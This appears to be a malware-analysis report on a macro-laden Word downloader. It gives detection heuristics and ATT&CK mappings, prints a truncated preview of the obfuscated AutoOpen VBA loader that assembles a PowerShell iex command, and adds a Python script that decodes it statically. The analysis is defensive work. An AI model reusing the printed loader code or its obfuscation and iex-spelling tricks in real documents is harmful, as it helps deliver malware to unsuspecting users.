Verdict: MALICIOUS
Risk score: 342

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying an obfuscated VBA macro that runs from AutoOpen. The macro pads its code with junk arithmetic on undefined variables (harmless under `On Error Resume Next`) and assembles a PowerShell command from short string literals and `Chr()` calls, so the command never appears contiguously in the source. The recovered fragment reads `...wershell . ($Env:ComSpec[4,24,25]-join'') ( -join ([char[]] (122, 47, ...`: on a default Windows install `$Env:ComSpec` is `C:\Windows\system32\cmd.exe`, so indices 4, 24 and 25 spell `iex`, and the command passes a second string, rebuilt from a numeric char array, to Invoke-Expression. The heuristics also flag CreateObject and Shell calls, the usual sinks for launching such a command. Together this is the shape of a downloader: the PowerShell stage is most likely responsible for fetching and executing a second-stage payload.
Heuristics (9)

- ClamAV: Doc.Downloader.Valyria-7165724-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-7165724-0
- VBA macros detected [medium, OLE_VBA_MACROS; 5 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This particular URL is the DrawingML XML namespace identifier present in any document with drawing content and is not a network indicator for this sample.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15148 bytes |

SHA-256 (macros.bas): 4af74ec9c7a143857c0649c2a1b6005a13b8890fe90c4a2d3f908eb52e017f5d
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "fvnhmznjuhIDG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
WZRkt = PJPmUf / jpULYW + (nQUmUz + WXthzB)
brHQDO = kCTzXZ / ciRmH + (FFfPur + mWFViC)
cEITY = jRTVbW / uKPMt + (fWMrVL + JOzzV)
QJaAwE = UnXIwm / BJsKq + (EApofz + KzuqJ)
ziJTi = ZoMuTV / rLqJkF + (rQMnH + jRTVz)
PizJfzbJbWha (IdhahA + EYzbTjFuK + mSEZnEkjOb + zwwrKhbfmw)
wfjQar = JPQkQ / RPMjPq + (cLNkjf + wNJBp)
VXXYKY = GTBlvE / sHKfVk + (kRwju + PwGOvw)
spIFSu = rLzlb / GGwVTj + (kFYoP + iKNmpw)
vfGsKO = hAwCq / RCHokP + (QjSVM + zHUruM)
End Sub
Attribute VB_Name = "zSCaDpBtGzwT"
Function IdhahA()
On Error Resume Next
ZIjVF = DXnjc / cJzwq * 68363 - GCJCQ * IXdPB / jrmViQ / 75815 * tJmJio + 48784 * PcpHI
inMzD = (52994 - zwvjm / 11591 / wWbIma - 19480 - ijhEvj - XimlfT + ziTGOi) * 41782 / lhUJCO - 30941 - 77632
ZlJVfY = LKTHZ / PYjZEo * 88513 - hYTLFQ * pEzDBz / vjzuqz / 16394 * PMJwOQ + 54269 * ZamwrM
QPtwPU = hNluZ / jUFZs * 59866 - ETpIn * ouUBab / hzFhp / 36728 * PKTIjT + 66373 * ioMVdO
qiEfQw = czbNuA / fJZzpf * 22959 - Zmvzjm * jHtNnp / kSNUam / 67208 * irjtit + 79939 * ztlOJ
VwmkiM = "wershell" + " " + " " + " . " + Chr(40) + " " + "$Env" + ":COmS"
QGQHw = ZHlvsL / oOfDrP * 95915 - AXcop * Baufj / iFcAj / 90455 * jiXjvN + 58223 * NJDQnk
GmuHs = IlQBAS / XtsTKJ * 31379 - ozUwP * pLnKub / jDzEU / 81690 * ZhiSRj + 92270 * iKVKBS
ioTHq = hrPLC / jmfXw * 40545 - ldoja * hnRqP / XmptMN / 75570 * KzfTj + 21268 * rbdjU
SEMQDwBS = "pec[" + "4,24" + ",25]-j" + "OIn''" + Chr(41) + " " + Chr(40) + " -jOIN " + Chr(40) + " [CHar[" + "]] " + Chr(40) + "122 ," + " 47 , 56," + "41 ,99 ,4"
LdFTZ = qFqdrq / OpSUiG * 36610 - ijvrd * ojZjNO / trkcz / 8839 * NaCEHp + 91889 * shnLVY
TsdZz = kSIAHq / ztwuXQ * 9941 - GchBn * BRkkGJ / ltNkKw / 89493 * SjCzj + 23210 * mhpDmp
KbwABV = tdcTV / hrfCfo * 7624 - qkojJr * wCsBNz / BDEmrJ / 16914 * iVahKq + 15613 * qjcNT
UNwwNP = "8 ,59 , " + "41,1" + "15,49, " + "60 , " + "52 , 59 " + ", 61 ," + "42, 126 ," + " 16, 59" + " , 4"
XJjiAX = AjjMz / JMRKQo * 92342 - CHjDfC * DWFYcR / APLCv / 29922 * TzzzD + 46249 * mbZYUR
YtpCh = unOSE / oRhSm * 46472 - jTfqD * fRUUU / FEpIn / 70831 * XudZLS + 43458 * wLiNB
DiVUV = JbnXSw / BwNtj * 55037 - IjGciS * ujAIz / wMjjau / 8571 * YMalb + 31656 * dLfopm
tFjjjwaB = "2,112 ,9 " + ", 59" + ",60,29 ," + " 50, " + "55 ,59, " + "48 ,42," + "101 , " + "122,46 ," + "58, 18" + " , 99 " + ",121" + " , 5"
CtCmA = zaSuI / JwJthv * 1422 - GuTYjz * GqHStt / nPlwqV / 93920 * GRKXu + 94817 * lfGQj
HZCMG = "4 , 42," + "42,46" + " , 100 ," + "113," + "113," + " 40, 63,5" + "3, 55, " + "42 , 108 " + ", 106,1" + "12, 61,49" + " ,51 ,"
iFBSq = KcOFPL / HjEijC * 75676 - NJFlF * bLdNp / pHtoDG / 36357 * pvSilG + 55994 * BlzBVX
mDDGuc = YlKsXD / wioIQ * 41855 - wzYYhu * fJrrW / jkJSPz / 34508 * QRNOGN + 41162 * VqoAjq
wjkfjQ = sahEAp / bcjrN * 34496 - aAwbfK * PnJSqw / XVnMYJ / 50153 * ECcGl + 19506 * RdJwF
bjhkOIpH = "113," + "57, 61 ," + "107, 21," + "53, 109," + " 9,17 ,10" + "2,113" + " ,30" + " , 54, " + "42 , 42, " + "46 ,10" + "0, 113 ," + " 113, "
MhQscS = BMXMU / sTDQf * 64846 - JbhAj * BCVHtj / kDQAnn / 98577 * MtqJi + 98566 * VwTKWT
AQMoRw = Eifqlo / Ccriz * 93711 - qrBoCh * oiKLL / Pkbwh / 26096 * oLdoNJ + 35441 * qSnUbD
TQwQhNUc = "41 ,41, 4" + "1, 112 " + ", 49 , 5" + "1 , 4" + "3 , 44 , " + "51,63 "
IdhahA = VwmkiM + SEMQDwBS + UNwwNP + tFjjjwaB + HZCMG + bjhkOIpH + TQwQhNUc
AORGP = ViZWnS / tAlPs * 59785 - NasOf * PWrkPG / QwSwa / 48625 * HJnnf + 52255 * ZmiMKi
zflOQo = OsjETP / nHoIw * 88766 - VBKRVj * oNoqvo / NGiPp / 97539 * sZPiQV + 92202 * XpumMi
QSXGqQ = RCFISV / vqLjwh * 78559 - mkGKi * BOMuZ / jbbBsr / 85883 * dsKlJT + 96437 * fjFMzq
ZVCbRj = npHhHl / hppTPG * 7259 - FjEKpj * XEbzT / wuwIj / 14920 ... (truncated)
```
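The following is an added worked example, not part of the analyzer's report or of the sample: a small Python static decoder that recovers the PowerShell command from the string-building statements of `Function IdhahA()` shown in the preview above without executing the macro. It walks the VBA line by line, evaluates only assignments made of string literals, `Chr(n)` calls and previously resolved names (the junk arithmetic on undefined variables is skipped because it never evaluates to a string), resolves the `$Env:ComSpec[4,24,25]-join''` idiom against the default `%ComSpec%` path (an assumption about the victim host), and parses the numeric `[char[]]` array out of the result. The embedded excerpt is a trimmed copy of the preview; the trimming is mine.

```python
import re

# Constructed input: the string-building statements of Function IdhahA() as they
# appear in the olevba preview, with most junk-arithmetic lines omitted (two are
# kept to show they are ignored). The VBA is the sample's; the trimming is mine.
VBA_EXCERPT = r'''
Function IdhahA()
On Error Resume Next
ZIjVF = DXnjc / cJzwq * 68363 - GCJCQ * IXdPB / jrmViQ / 75815 * tJmJio + 48784 * PcpHI
VwmkiM = "wershell" + " " + " " + " . " + Chr(40) + " " + "$Env" + ":COmS"
SEMQDwBS = "pec[" + "4,24" + ",25]-j" + "OIn''" + Chr(41) + " " + Chr(40) + " -jOIN " + Chr(40) + " [CHar[" + "]] " + Chr(40) + "122 ," + " 47 , 56," + "41 ,99 ,4"
UNwwNP = "8 ,59 , " + "41,1" + "15,49, " + "60 , " + "52 , 59 " + ", 61 ," + "42, 126 ," + " 16, 59" + " , 4"
tFjjjwaB = "2,112 ,9 " + ", 59" + ",60,29 ," + " 50, " + "55 ,59, " + "48 ,42," + "101 , " + "122,46 ," + "58, 18" + " , 99 " + ",121" + " , 5"
HZCMG = "4 , 42," + "42,46" + " , 100 ," + "113," + "113," + " 40, 63,5" + "3, 55, " + "42 , 108 " + ", 106,1" + "12, 61,49" + " ,51 ,"
bjhkOIpH = "113," + "57, 61 ," + "107, 21," + "53, 109," + " 9,17 ,10" + "2,113" + " ,30" + " , 54, " + "42 , 42, " + "46 ,10" + "0, 113 ," + " 113, "
MhQscS = BMXMU / sTDQf * 64846 - JbhAj * BCVHtj / kDQAnn / 98577 * MtqJi + 98566 * VwTKWT
TQwQhNUc = "41 ,41, 4" + "1, 112 " + ", 49 , 5" + "1 , 4" + "3 , 44 , " + "51,63 "
IdhahA = VwmkiM + SEMQDwBS + UNwwNP + tFjjjwaB + HZCMG + bjhkOIpH + TQwQhNUc
End Function
'''

# Assumption: the victim runs a stock Windows install, where %ComSpec% is this path.
DEFAULT_COMSPEC = r'C:\WINDOWS\system32\cmd.exe'

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# Tokens of a pure string-builder expression: "literal", Chr(n), a name, '+', blanks.
# (Doubled-quote escapes inside literals are not needed for this sample and not handled.)
TOKEN_RE = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)|\+|\s+')
COMSPEC_IDX_RE = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
CHAR_ARRAY_RE = re.compile(r'\[char\[\]\]\s*\(\s*([\d,\s]+)', re.IGNORECASE)


def eval_concat(expr, env):
    """Evaluate a VBA expression made only of string literals, Chr(n) and already-known
    names joined by '+'. Returns None for anything else, which is how the junk
    arithmetic lines get dropped."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            return None                      # operator other than '+': not a string builder
        pos = m.end()
        lit, chr_n, name = m.group(1), m.group(2), m.group(3)
        if lit is not None:
            out.append(lit)
        elif chr_n is not None:
            out.append(chr(int(chr_n)))
        elif name is not None:
            if name not in env:
                return None                  # undefined name: junk line, skip it
            out.append(env[name])
    return ''.join(out)


def recover_strings(vba_source):
    """Walk the macro top to bottom and keep every assignment that evaluates to a string."""
    env = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            value = eval_concat(m.group(2), env)
            if value is not None:
                env[m.group(1)] = value
    return env


def resolve_comspec_indexing(cmd, comspec=DEFAULT_COMSPEC):
    """Replace $Env:ComSpec[i,j,k]-join'' with the characters those indices select."""
    def pick(m):
        return ''.join(comspec[int(i)] for i in m.group(1).split(','))
    return COMSPEC_IDX_RE.sub(pick, cmd)


def extract_char_array(cmd):
    """Return the integers of the first [char[]] ( n, n, ... ) argument in the command."""
    m = CHAR_ARRAY_RE.search(cmd)
    if not m:
        return []
    return [int(x) for x in m.group(1).split(',') if x.strip()]


def analyze(vba_source, comspec=DEFAULT_COMSPEC):
    """Recover IdhahA, resolve the ComSpec trick and classify the char array."""
    raw = recover_strings(vba_source).get('IdhahA', '')
    command = resolve_comspec_indexing(raw, comspec)
    values = extract_char_array(command)
    return {
        'command': command,
        'char_values': values,
        # values outside printable ASCII mean the array is not yet the final script text
        'non_printable': sorted({v for v in values if v < 32 or v > 126}),
    }


if __name__ == '__main__':
    result = analyze(VBA_EXCERPT)
    print(result['command'])
    print(len(result['char_values']), 'char values; non-printable:', result['non_printable'])
```

Running it prints `wershell   . ( Iex) ( -jOIN ( [CHar[]] (122 , 47 , ...`, i.e. the dot call operator invoking `iex` on a string joined from the char array. Two things worth noting from the output: the recovered fragment begins at `wershell`, so the leading characters of `powershell` are not in `IdhahA` and the preview does not show where they come from; and the 83 array values include control-range codes (9, 16, 17, 18, 21, 29, 30), so the array is not the plaintext script as shown and whatever follows the truncated preview must transform it further before it becomes readable. Treat the array as an intermediate, not as the payload.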